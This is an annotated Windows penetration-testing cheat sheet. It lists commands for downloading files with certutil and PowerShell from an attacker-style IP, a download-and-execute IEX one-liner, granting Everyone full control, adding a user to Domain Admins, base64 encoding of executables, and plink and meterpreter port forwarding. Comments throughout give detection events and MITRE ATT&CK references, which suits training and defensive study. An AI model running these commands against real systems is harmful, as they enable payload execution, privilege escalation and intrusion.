99 Basic Command
Downloading files
Changing Permissions of a file
Adding user to Domain admins
Base64 Encode-Decode
Port Forwarding
# File download
# certutil (the built-in certificate tool) used as a downloader: fetches the URL and writes it to the local file.
# A copy of the response also stays in the per-user CryptnetUrlCache, which is a useful forensic artifact.
# Detection: certutil.exe with -urlcache and a URL on its command line (MITRE ATT&CK T1105).
certutil.exe -urlcache -split -f http://ip/file file
# Saves the response body to the path given by -OutFile.
# Nothing here checks integrity: compare the file against a known hash (Get-FileHash) before using it.
Invoke-WebRequest "https://server/filename" -OutFile "C:\Windows\Temp\filename"
# PowerShell download
# "-exec bypass" abbreviates -ExecutionPolicy Bypass. Execution policy is a safety setting, not a
# security boundary, so it should not be relied on as a control. The URL is plain HTTP, so the
# transfer has no integrity protection or server authentication.
# Detection: process-creation logging with command lines (event 4688 / Sysmon event 1) and new
# executables appearing under spool\drivers\color.
powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.18:8888/41020.exe' -OutFile 'C:\windows\system32\spool\drivers\color\41020.exe'"
# PowerShell: download and run a remote script
# Download-and-execute: DownloadString returns the script as text and IEX (Invoke-Expression) runs
# it in the current session. The script body is never written to disk, so file scanning will not see it.
# Find-AllVulns is not defined on this line; presumably it comes from the downloaded Sherlock.ps1.
# Detection: Script Block Logging (event 4104) and AMSI record the evaluated content.
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18:8888/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'"
# Adds an ACE giving the Everyone group Full control (F) of text.txt. /grant without :r adds to the
# existing ACL rather than replacing it. Any user who can reach the file can then modify or delete it.
# Revert after testing (icacls text.txt /remove Everyone) and audit for Everyone:F grants.
icacls text.txt /grant Everyone:F
# Adds the account "fkclai" to the Domain Admins group. Add-DomainGroupMember is not a built-in
# cmdlet; it appears to be the PowerView function, so that module must already be loaded (confirm).
# Detection: domain controllers log event 4728 (member added to a security-enabled global group).
# Alert on any change to Domain Admins membership.
Add-DomainGroupMember -Identity 'Domain Admins' -Members fkclai -Verbose
# Decodes the Base64 text file foo.b64 back into the binary foo.exe.
# Detection: certutil -decode producing an executable (MITRE ATT&CK T1140).
certutil -decode foo.b64 foo.exe
# Base64-encodes foo.exe into foo.b64; the output is wrapped in BEGIN/END CERTIFICATE lines.
certutil -encode foo.exe foo.b64
# Port forward using plink
# SSH remote forward (-R): port 8080 on the SSH server 192.168.1.56 is forwarded to 127.0.0.1:8080
# on the machine running plink. -pw puts the password on the command line, where process listings
# and process-creation logs expose it; prefer key authentication.
# Detection: plink.exe, or any outbound SSH, from hosts that do not normally use it.
plink.exe -l morph3 -pw pass123 192.168.1.56 -R 8080:127.0.0.1:8080
# Port forward using meterpreter
# Template: -l is the local listening port, -p the remote port and -r the remote host.
portfwd add -l attacker-port -p victim-port -r victim-ip
# Concrete example: local port 3306 is relayed to 192.168.1.56:3306 through the session.
# The target service sees the connection coming from the host running the session, so review its
# logs for unexpected internal clients.
portfwd add -l 3306 -p 3306 -r 192.168.1.56